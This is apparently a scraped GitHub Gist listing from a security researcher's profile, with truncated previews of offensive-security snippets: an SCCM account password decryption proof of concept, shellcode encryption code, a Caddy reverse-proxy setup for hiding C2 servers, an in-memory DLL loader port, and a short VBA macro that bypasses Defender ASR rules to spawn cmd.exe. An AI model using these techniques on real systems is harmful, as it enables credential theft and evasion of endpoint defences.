God is dead. Have you tried Node.js?

Marcello byt3bl33d3r

byt3bl33d3r / sccmdecryptpoc.cs
Created Jul 4, 2022 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
// Twitter thread: (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
internal class Program
byt3bl33d3r /
Last active Jan 17, 2022
Structured logging and event capture
from logger import capturer
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
async def get_logs(event_name: Optional[str] = None):
if not event_name:
byt3bl33d3r /
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (
#! /usr/bin/env python3
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
byt3bl33d3r / manager-config.yml
Created Nov 14, 2021
Nebula configuration files for docker swarm manager and worker nodes
# !! Remember to replace LIGHTHOUSE_IP with your actual Nebula lighthouse external IP Address
# See the example config file to know what all of these options do
ca: /etc/nebula/ca.crt
cert: /etc/nebula/host.crt
key: /etc/nebula/host.key
"": ["<LIGHTHOUSE_IP>:4242"]
byt3bl33d3r /
Created Oct 17, 2021 — forked from bontchev/
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides

byt3bl33d3r / mainc.c
Created Oct 2, 2021 — forked from jackullrich/mainc.c
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
byt3bl33d3r / Caddyfile
Last active Jan 23, 2022
Caddyfile reverse proxy example for C2 platforms
# This instructs Caddy to hit the LetsEncrypt staging endpoint, in production you should remove this.
(proxy_upstream) {
# Enable access logging to STDOUT
# This is our list of naughty client User Agents that we don't want accessing our C2
byt3bl33d3r / java-ikvm-dotnet
Created May 31, 2021 — forked from sixman9/java-ikvm-dotnet
Using IKVM to generate a C# assembly (dll) from a Java jar file
I wanted to use the Flying Saucer Java API in .NET so I tried to use IKVM to convert the Flying Saucer library:
ikvmc core-renderer.jar
For some reason, IKVMC gave me an exe core-renderer.exe so I renamed it to core-renderer.dll, added to my assemblies and hacked away
using java.lang;
using com.lowagie.text;
byt3bl33d3r / Out-CompressedDll.nim
Last active Apr 10, 2022
Compresses, Base-64 encodes and outputs PowerShell code to load a managed dll in memory. Port of the original PowerSploit script to Nim.
Requires the zippy library ("nimble install zippy")
import zippy/[inflate, deflate]
import base64
byt3bl33d3r / ASR Rules Bypass.vba
Created Apr 9, 2021 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub